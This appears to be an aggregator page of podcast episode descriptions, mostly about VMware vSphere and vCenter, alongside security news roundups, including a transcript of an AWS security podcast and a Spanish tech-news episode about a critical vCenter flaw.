You! Yes, you! Running vSphere 6.5 or 6.7? We understand, you're busy! For many, many reasons, you couldn't get around to upgrading your systems to 7.0 when VMware deprecated support for 6.7 and 6.5 on October 15th, 2022. So now you're at a cross roads. vSphere 8 is out, but fairly new, and comes with its own set of new hardware requirements. Assuming your existing hardware meets them, do you upgrade to vSphere 7 or vSphere 8? If instead you get new hosts, should you run ESXi 7 or 8 on them? And what if you're already running vSphere 7? Should you upgrade to 8? It's a been a little while, but your favorite, most empathetic, most wise and most entertaining IT therapists are back in the office to look at all things vSphere 8. In this episode of Data Center Therapy, your intrepid hosts Matt ‘Pi before Pi was cool' Yette and Matt ‘Distributed Everything Si-fu' Cozzolino teach you with their technology equivalents of the martial art of Wing Chun on what's new with vSphere 8. In this episode, you, our treasured watchers (DCT is now on YouTube!) and our listeners, will get to learn about: How mature ESXi 7.0 is, when it came out, and how relatively rare PSODs are now What some of the implications of the new hardware requirements are for ESXi 8, and how boot media and types have changed since ESXi 7 appeared What new concepts and hardware support exists in ESXi 8, what Distributed Processing Units (DPUs) do and how AI/ML and hardware consumption models are managed inside vCenter What changes have taken place in the Lifecycle Manager of vCenter to make things easier to update and upgrade (both on the ESXi front, as well as the firmware of the systems ESXi is deployed on!) 
How regions and availability zone concepts, once solely in cloud hosting providers, have trickled down into the vSphere command-and-control paradigms as well as Tanzu's current state of integration. As the Matts state in this episode, it's not too late to join “Professor” Cozzolino in his Introduction to vSphere 8 class March 21st through 24th, and his Advanced vSphere 8 class April 18th through 21st. If you need to know “how” to operate your systems, the Intro class is likely the best choice for you. If you'd like to know the “why” of best practices in vSphere, then the Advanced class is the best choice for you. To get registered ASAP, talk to your IVOXY Account Manager and we'll be happy to assist right away. As always, be sure to like, share and subscribe wherever you found this episode of Data Center Therapy. If you need assistance planning or executing your own organization's vSphere upgrades, please reach out to your IVOXY Account Manager. In the meantime, stay up to date, stay supported, stay stable and optimized (as we like our ESXi hosts to be), and stay informed, DCT friends! Talk to you on our next fresh episode!
SANS Internet Stormcenter Daily Network/Cyber Security and Information Security Stormcast
Fast Port Scanning in Powershell https://isc.sans.edu/diary/Port%20Scanning%20in%20Powershell%20Redux%3A%20Speeding%20Up%20the%20Results%20%28challenge%20accepted!%29/29324 Bypassing WAFs with JSON https://claroty.com/team82/research/js-on-security-off-abusing-json-based-sql-to-bypass-waf Invisible npm malware evading security checks https://jfrog.com/blog/invisible-npm-malware-evading-security-checks-with-crafted-versions/ PCI Secure Software Standard V 1.2 https://docs-prv.pcisecuritystandards.org/Software%20Security/Standard/PCI-Secure-Software-Standard-v1_2.pdf VMWare/VCenter Patches https://www.vmware.com/security/advisories/VMSA-2022-0030.html
Patch Tuesday Recap, Adobe, SAP & Microsoft, VMWare vCenter Server unpatched Cybersecurity News CyberHub Podcast October 12th, 2022 Today's Headlines and the latest #cybernews from the desk of the #CISO: Patch Tuesday: Critical Flaws in ColdFusion, Adobe Commerce Microsoft Warns of New Zero-Day; No Fix Yet for Exploited Exchange Server Flaws SAP Patches Critical Vulnerabilities in Commerce, Manufacturing Execution Products ICS Patch Tuesday: Siemens, Schneider Electric Release 19 New Security Advisories All Windows versions can now block admin brute-force attacks VMware vCenter Server bug disclosed last year still not patched Story Links: https://www.securityweek.com/patch-tuesday-critical-flaws-coldfusion-adobe-commerce https://www.securityweek.com/microsoft-warns-new-zero-day-no-fix-yet-exploited-exchange-server-flaws https://www.securityweek.com/sap-patches-critical-vulnerabilities-commerce-manufacturing-execution-products https://www.securityweek.com/ics-patch-tuesday-siemens-schneider-electric-release-19-new-security-advisories https://www.bleepingcomputer.com/news/microsoft/all-windows-versions-can-now-block-admin-brute-force-attacks/ https://www.bleepingcomputer.com/news/security/vmware-vcenter-server-bug-disclosed-last-year-still-not-patched/ “The Microsoft Doctrine” by James Azar now on Substack https://jamesazar.substack.com/p/the-microsoft-doctrine The Practitioner Brief is sponsored by: Your BRAND here - Contact us for opportunities today! 
Meet Piotr Tarnawski, who runs the AngrySysop.com Blog. Piotr has 44 Articles on vCenter, 17 on vROps and 14 on Powershell. We will cover some of his favorite articles, what makes him blog, and learn what it's like for him as an enterprise IT Operations Engineer at a Fortune 500 company!
In this week's episode, I talk about the acquisition of Citrix, a pretty crazy story of a security researcher taking on North Korea, some GDPR compliance concerns exposed in Belgium and much more! Reference Links: https://www.rorymon.com/blog/episode-215-citrix-acquired-vcenter-converter-unavailable-365-portals-offline/
Ronak Zala is a performance engineer at VMware, California. At the Silicon Valley tech giant, he has developed various microservice applications from scratch. His Cloud JVM Profiling Service for distributed micro-service architectures is currently being applied at scale for monitoring and analysis at VMware's vCenter. He shares his fascinating journey as a software developer at VMware and the innovative environment which fostered his growth as a programmer. He also provides valuable experiences and exclusive insights about core engineering concepts including byte code manipulation, APMs, stack overflow, heap analysis, fixing memory leaks, low overhead memory management for optimizing CPU cycles, quantum computing, AHM-64, and much more. Watch Full Video https://bit.ly/techkraftpodcastvideo-18 Host : Ravi Mandal https://www.linkedin.com/in/ravimandal/ https://instagram.com/rvimandal Guest: Ronak Zala https://www.linkedin.com/in/ronakzala/ TechKraft Inc info@techkraftinc.com https://www.linkedin.com/company/tech... https://facebook.com/techkraftinc http://instagram.com/techkraftinc
Hello everyone! This episode will be about relatively recent critical vulnerabilities. Let's start with Microsoft Patch Tuesday for October 2021. Specifically, with the vulnerability that I expected there, but it didn't get there. Watch the video version of this episode on my YouTube channel. Read the full text of this episode with all links on avleonov.com blog.
Links:
“I Trust AWS IAM to Secure my Applications. I Don't Trust the IAM Docs to Tell Me How”: https://ben11kehoe.medium.com/i-trust-aws-iam-to-secure-my-applications-i-dont-trust-the-iam-docs-to-tell-me-how-f0ec4c119e79
“Introduction to Zero Trust on AWS ECS Fargate”: https://omerxx.com/identity-aware-proxy-ecs/
Threat Stack Acquired by F5: https://techcrunch.com/2021/09/20/f5-acquires-cloud-security-startup-threat-stack-for-68-million/
AWS removed from CVE-2021-38112: https://rhinosecuritylabs.com/aws/cve-2021-38112-aws-workspaces-rce/
Ransomware that encrypts the contents of S3 buckets: https://rhinosecuritylabs.com/aws/s3-ransomware-part-1-attack-vector/

Transcript

Corey: This is the AWS Morning Brief: Security Edition. AWS is fond of saying security is job zero. That means it's nobody in particular's job, which means it falls to the rest of us. Just the news you need to know, none of the fluff.

Corey: This episode is sponsored in part by Thinkst Canary. This might take a little bit to explain, so bear with me. I linked against an early version of their tool, canarytokens.org, in the very early days of my newsletter, and what it does is relatively simple and straightforward. It winds up embedding credentials, files, or anything else like that that you can generate in various parts of your environment, wherever you want them to live. It gives you fake AWS API credentials, for example, and the only thing that these things do is alert you whenever someone attempts to use them. It's an awesome approach to detecting breaches. I've used something similar for years myself before I found them. Check them out. But wait, there's more because they also have an enterprise option that you should be very much aware of: canary.tools. You can take a look at this, but what it does is it provides an enterprise approach to drive these things throughout your entire environment and manage them centrally. You can get a physical device that hangs out on your network and impersonates whatever you want to. When it gets Nmap scanned, or someone attempts to log into it, or access files that it presents on a fake file store, you get instant alerts. It's awesome. If you don't do something like this, instead you're likely to find out that you've gotten breached the very hard way. So, check it out. It's one of those few things that I look at and say, “Wow, that is an amazing idea. I am so glad I found them. I love it.” Again, those URLs are canarytokens.org and canary.tools. And the first one is free because of course it is. The second one is enterprise-y. You'll know which one of those you fall into. Take a look. I'm a big fan. More to come from Thinkst Canary weeks ahead.

Corey: This podcast seems to be going well. The Meanwhile in Security podcast has been fully rolled over and people are chiming in with kind things, which kind of makes me wonder, is this really a security podcast? Because normally people in that industry are mean.

Let's dive into it. What happened last week in security? Touching AWS, Ben Kehoe is on a security roll lately. His title of the article in full reads, “I Trust AWS IAM to Secure My Applications. I Don't Trust the IAM Docs to Tell Me How”, and I think he's put his finger on the pulse of something that's really bothered me for a long time. IAM feels arcane and confusing. The official doc just made that worse for me. My default is assuming that the problem is entirely with me, but that's not true at all. I suspect I'm very far from the only person out there who feels this way.

An “Introduction to Zero Trust on AWS ECS Fargate” is well-timed. Originally when Fargate launched, the concern was zero trust of AWS ECS Fargate, but we're fortunately past that now. The article is lengthy and isn't super clear as to the outcome that it's driving for and also forgets that SSO was for humans and not computers, but it's well documented and it offers plenty of code to implement such a thing yourself. It's time to move beyond static IAM roles for everything.

Threat Stack has been a staple of the Boston IT scene for years; they were apparently acquired by F5 for less money than they'd raised, which seems unfortunate. I'm eagerly awaiting to see how they find F5 for culture. I bet it's refreshing.

And jealous of Azure's attention in the past few episodes of this podcast, VMware wishes to participate by including a critical severity flaw that enables ransomware in vCenter or vSphere. I can't find anything that indicates whether or not VMware on AWS is affected, so those of you running that thing, you should probably validate that everything's patched. Reach out to your account manager, which if you're running something like that, you should be in close contact with anyway.

Corey: Now from AWS themselves, what do they have to say? Not much last week on the security front, their blog was suspiciously silent. Scuttlebutt on Twitter has it that they're attempting to get themselves removed from an exploit, a CVE-2021-38112, which is a remote code execution vulnerability. If you have the Amazon WorkSpaces client installed, update it because a malicious URL could cause code to be executed in the client's machine. It's been patched, but I think AWS likes not having public pointers to past security lapses lurking around. I don't blame them, I mean, who wants that? The reason I bring it up is not to shame them for it, but to highlight that all systems have faults in them. AWS is not immune to security problems, nor is any provider. It's important, to my mind, to laud companies for rapid remediation and disclosure and to try not to shame them for having bugs in the first place. I don't always succeed at it, but I do try. But heaven help you if you try to blame an intern for a security failure.

And instead of talking about a tool, let's do a tip of the week. Ransomware is in the news a lot, but so far, all that I've seen with regard to ransomware that encrypts the contents of S3 buckets is theoretical proofs—or proves—of concept. That said, for the data you can't afford to lose, you've got a few options that stack together neatly. The approach distills down to some combination of enabling MFA delete, enabling versioning on the bucket, and setting up replication rules to environments that are controlled by different credential sets entirely. This will of course become both maintenance-intensive and extremely expensive for some workloads, but it's always a good idea to periodically review your use of S3 and back up the truly important things.

Announcer: Have you implemented industry best practices for securely accessing SSH servers, databases, or Kubernetes? It takes time and expertise to set up. Teleport makes it easy. It is an identity-aware access proxy that brings automatically expiring credentials for everything you need, including role-based access controls, access requests, and the audit log. It helps prevent data exfiltration and helps implement PCI and FedRAMP compliance. And best of all, Teleport is open-source and a pleasure to use. Download Teleport at goteleport.com. That's goteleport.com.

Corey: I have been your host, Corey Quinn, and if you remember nothing else, it's that when you don't get what you want, you get experience instead. Let my experience guide you with the things you need to know in the AWS security world, so you can get back to doing your actual job. Thank you for listening to the AWS Morning Brief: Security Edition with the latest in AWS security that actually matters. Please follow AWS Morning Brief on Apple Podcast, Spotify, Overcast—or wherever the hell it is you find the dulcet tones of my voice—and be sure to sign up for the Last Week in AWS newsletter at lastweekinaws.com.

Announcer: This has been a HumblePod production. Stay humble.
This Week in the Security News: The Side Eye Toddler, Zix, Clubhouse, VCenter redux, Auntie M, Safepal, Virgil Griffith, the FBI, & the Expert Commentary of Jason Wood! Show Notes: https://securityweekly.com/swn153 Visit https://www.securityweekly.com/swn for all the latest episodes! Follow us on Twitter: https://www.twitter.com/securityweekly Like us on Facebook: https://www.facebook.com/secweekly
In this episode Chris talks about applying a Windows update that broke all of his printing. Josh talks about a student that sent him an email asking for filter changes to be applied, and he talks about an experience with a stolen Chromebook. Cory talks about his new visitor management system. The newly released critical patches for Nagios and VCenter are also discussed. Article we discuss - https://www.bleepingcomputer.com/news/security/new-windows-security-updates-break-network-printing/ Check out our sponsor ClassLink | Single Sign-On for Education Tweet us at @k12techtalkpod email us k12techtalk@gmail.com BUY A SHIRT AND/OR HOODIE! https://tinyurl.com/k12techtalkGOTSHIRTS Visit our sponsors at: somethingcool.com provisionds.com arubanetworks.com classlink.com
HCI Mesh is a unique, software-based approach for disaggregation of compute and storage resources. HCI Mesh brings together multiple independent vSAN clusters for a native, cross-cluster architecture that disaggregates resources and enables the utilization of stranded capacity. Simply, vSAN allows one or more vSAN clusters to remotely mount datastores from other vSAN clusters (servers) within vCenter inventory. This week on the Virtually Speaking Podcast we welcome David Boone to help unpack this vSAN feature. Read more
Learn how to set up your own home lab with @vmwarensxcloud, who takes you through his 10-part blog series showing you the key elements to set up your home lab. Part 8 covers vCenter setup!
On this week's episode of the podcast I cover some highlights from Microsoft BUILD and Google IO. I also get into multiple stories about vulnerabilities and Ransomware attacks plus much more! Reference Links: https://www.rorymon.com/blog/episode-178-major-vulnerabilities-published-sysinternals-updates-more/
On May 26, the Japan Computer Emergency Response Team Coordination Center (JPCERT/CC) issued an alert regarding multiple vulnerabilities in VMware vCenter Server. The affected systems are as follows.
Fuchsia OS exists / Criminals' data recovered / More limits on cash payments / Windows 10 keeps out of sight / Inside the M1 iMac / Huge bug in vCenter

Sponsor: The new summer language-immersion programs http://cursosnle.com/ from Nathalie Language Experiences are here. Designed for children aged 10 to 18, who can travel to London, Malta or the Pyrenees and learn English with native teachers http://cursosnle.com/ and with host families. Ask for more information today, with no obligation http://cursosnle.com/.

Google launches Fuchsia OS by surprise. The first device chosen is the 2018 Nest Hub https://www.elespanol.com/elandroidelibre/noticias-y-novedades/20210525/fuchsia-oficial-nuevo-sistema-operativo-google-domotica/583941889_0.html, the smart displays with few functions beyond housing the Google Assistant. Fuchsia OS almost imperceptibly replaces the current Cast OS as the ultra-light base on which to display digital services. Will it reach more devices such as TVs, home automation, Chromecasts... phones? Is it simply a place to cautiously check how it works?

British police recover the data on criminals that they deleted by mistake. In January, a syntax error in an aging storage system wiped the computer records of almost 113,000 criminals, including evidence and more. The data has now been recovered https://www.bbc.com/news/uk-politics-57242885, they say it has not affected current investigations, and that they will modernize the system in... 2028.

The Spanish government wants to control digital and non-digital payments. It lowers the limit on cash payments to 1,000 euros for professionals, while it stays at 2,500 for private individuals: everything else must be digital https://www.businessinsider.es/puede-afectarte-nueva-ley-fraude-fiscal-871025. It will add tighter control of crypto-asset wallets at the national and international level.

Microsoft shows us nothing of the future of Windows 10. A lot of "it's going to be great" and "it's going to change everything", but we are left wanting https://www.genbeta.com/actualidad/satya-nadella-promete-actualizaciones-importantes-windows-ultima-decada-muy-pronto and without seeing anything. It seems they want to renew both part of the interface (Sun Valley) and the application distribution that was part of the essence of Windows 10X. We'll see.

The creator of the GDPR says the regulation has fallen short. Viviane Reding, the former European Union Justice Commissioner who introduced the GDPR in 2012, thinks its administration should be more federalized and that the mechanisms it gives governments and agencies are underused https://www.politico.eu/article/eu-privacy-laws-chief-architect-calls-for-its-overhaul/. Translation: bigger sticks are needed.

The new 24" iMacs are almost empty inside. Despite being thinner than the original iPhone, the logic board is so small that it leaves room for two large metal plates https://www.ifixit.com/Teardown/iMac+M1+24-Inch+Teardown/142850#s288463 whose only function seems to be to amplify the speakers, and which take up 30% of the front area below the screen. Curious.

Jeff Bezos's Amazon profile has been found. He left six reviews during the first years https://www.inc.com/bill-murphy-jr/i-just-found-everything-jeff-bezos-has-ever-reviewed-on-amazon-its-utterly-fascinating.html of the e-commerce site, the last one about a bottle of fresh milk https://www.amazon.com/gp/profile/amzn1.account.AHDRLTPKOLOHOHLVQ7U7TVCRPW7A/ref=cm_cr_srp_d_gw_btm?ie=UTF8&tag=wwwinccom-20 with vitamins, but since 2006 he has been very busy. Now that he is leaving Amazon in a few months, perhaps he will go back to commenting on his purchases.

Movie piracy over WhatsApp in India strikes me as an extremely curious case. On one hand, the encryption of the transfers makes detection harder, but on the other hand it is extremely simple to block the distributors https://torrentfreak.com/court-orders-whatsapp-to-suspend-users-sharing-pirated-movie-210524/, as this ruling indicates. But I don't quite understand how those who received the material were detected.

Tidal and Spotify add offline music playback on the Apple Watch. After many years of waiting, users will be able to select songs and playlists that will be stored directly on the watch https://www.elespanol.com/omicrono/software/20210521/spotify-descargar-apple-watch-escucharla-sin-conexion/582942768_0.html, so they can listen to them https://www.elespanol.com/omicrono/software/20210525/tidal-propia-aplicacion-apple-watch-plantarle-spotify/583942786_0.html without needing an Internet connection.

A massive vulnerability in VMware's vCenter alarms experts. It basically allows arbitrary code execution and taking control of the machines it manages https://arstechnica.com/gadgets/2021/05/vulnerability-in-vmware-product-has-severity-rating-of-9-8-out-of-10/. It affects versions 6.x and 7. There is a patch, but it is hugely popular software in data centers, and many of you may have data that at some point passes through those machines.
VMware is pervasive in healthcare, it's time to check your servers if you haven't already done so.

FTA

The security flaw, which VMware disclosed and patched on Tuesday, resides in the vCenter Server, a tool used for managing virtualization in large data centers. vCenter Server is used to administer VMware's vSphere and ESXi host products, which by some rankings are the first and second most popular virtualization solutions on the market. Enlyft, a site that provides business intelligence, shows that more than 43,000 organizations use vSphere.

“Serious”

A VMware advisory said that vCenter machines using default configurations have a bug that, in many networks, allows for the execution of malicious code when the machines are reachable on a port that is exposed to the Internet. The vulnerability is tracked as CVE-2021-21985 and has a severity score of 9.8 out of 10.

---

Time to get to work.

#healthcare #cybersecurity #vmwarevsphere #healthit #cio #cmio #chime #himss

https://arstechnica.com/gadgets/2021/05/vulnerability-in-vmware-product-has-severity-rating-of-9-8-out-of-10/
Heavy Networking dives into building cost-effective, practical, and easily managed leaf-spine networks with sponsor Dell Technologies. We discuss Dell's SmartFabric Services offering, including the underlying infrastructure and software overlay, key automation features, interconnects for enterprise uses such as HCI, and more. Our guest is Saleem Muhammad, Director of Product Management and Marketing at Dell Technologies.
SANS Internet Stormcenter Daily Network/Cyber Security and Information Security Stormcast
Exploiting Struts in vCenter https://isc.sans.edu/forums/diary/Struts+Vulnerability+CVE20175638+on+VMware+vCenter+the+Gift+that+Keeps+on+Giving/24606/ Wikipedia Tech Support Scam https://isc.sans.edu/forums/diary/Wikipedia+Articles+as+part+of+Tech+Support+Scamming+Campaigns/24608/ Stealing MacOS Keychain https://www.youtube.com/watch?v=nYTBZ9iPqsU Beauty Camera Ads for Android include Adware https://blog.trendmicro.com/trendlabs-security-intelligence/various-google-play-beauty-camera-apps-sends-users-pornographic-content-redirects-them-to-phishing-websites-and-collects-their-pictures/
vChat (MP3 VERSION) - The Latest in Virtualization and Cloud Computing
In episode #44, Simon and David chat with Emad Younis of EmadYounis.com and VMware fame to learn what's new in vSphere 6.5, specifically related to vCenter and vSphere Management. Emad is an expert in vCenter and the entire upgrade process from vSphere 5.x and 6.x to 6.5 and offers a lot of good tips and […]